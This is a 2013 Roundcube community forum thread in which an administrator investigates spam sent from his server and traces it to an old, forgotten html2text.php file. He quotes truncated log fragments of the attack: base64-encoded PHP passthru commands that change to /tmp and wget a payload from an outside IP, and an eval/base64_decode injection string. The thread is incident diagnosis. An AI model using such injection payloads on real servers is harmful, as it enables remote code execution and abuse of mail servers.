Roundcube Community Forum

News and Announcements => General Discussion => Topic started by: adaviel on August 07, 2013, 05:16:12 PM

Title: Possible exploit in 0.8.5 ?
Post by: adaviel on August 07, 2013, 05:16:12 PM
I installed 0.8.5 a few months ago to evaluate, but I don't actively use it. I have Apache httpd-2.2.3-63-el , php-5.1.6-39-el on RedHat 5.2, admittedly not the latest updates for EL which are 2.2.3-78 and .1.6-40.el5


I'm trying to track down some process that has managed to send a load of spam through my server - while I was away at a conference, of course.... I still haven't found a smoking gun, but sendmail has "apache set sender to no-replay@ups.com using -f" and I found a few entries in Apache logs like:
POST /roundcube/bin/html2text.php
(although not nearly enough to account for all the spam logged by sendmail)

This isn't the previously patched vulnerability in user preferences - I don't have any active users, and there's no GETs in the logs, only these POSTs

I don't have full network logging, but there's curious looking stuff that I do have, viz.
POST /roundcube/bin/html2text.php
    Accept: cGFzc3RocnUoImVjaG8gLW47Iik7Cg==\r\n
Data: <b>{${EVAL(BASE64_DECODE($_SE...
POST /roundcube/bin/html2text.php
    Accept: cGFzc3RocnUoImVjaG8gLW47Y2QgL3RtcDsgd2dldCAxNzQuMTIxLjczLjE2Mi9pY....

Those HTTP Accept strings are base-64 encoded versions of:
  passthru("echo -n;");
  passthru("echo -n;cd /tmp; wget ....
which looks decidedly suspicious.

I'm not sure if this issue is with RoundCube, or PHP, or Apache, or some config entry I broke.
Title: Re: Possible exploit in 0.8.5 ?
Post by: SKaero on August 07, 2013, 08:19:24 PM
There is a problem with the path you posted "/roundcube/bin/html2text.php" there isn't and never has been a html2text.php file in RoundCube's bin folder. It has most likely been added by something malicious. I don't know of any vulnerability in RoundCube 0.8.x but it does require PHP 5.2.1 or greater so you may have opened up a hole within PHP.
Title: Re: Possible exploit in 0.8.5 ?
Post by: adaviel on August 08, 2013, 02:47:15 AM
In roundcubemail-0.8.5.tar.gz
there is a roundcubemail-0.8.5/program/lib/html2text.php

But yes, it looks like I have an old html2text.php I'd forgotten about from 2008, probably 0.1-STABLE.
That matches http://trac.roundcube.net/ticket/1485618 (http://trac.roundcube.net/ticket/1485618)

I guess there are still some scanners around looking for this. The attacker went straight to the POST operation and did not
do any other HTTP operations from the same address, and nothing else appears to have accessed that or any other roundcube URLs in the past month.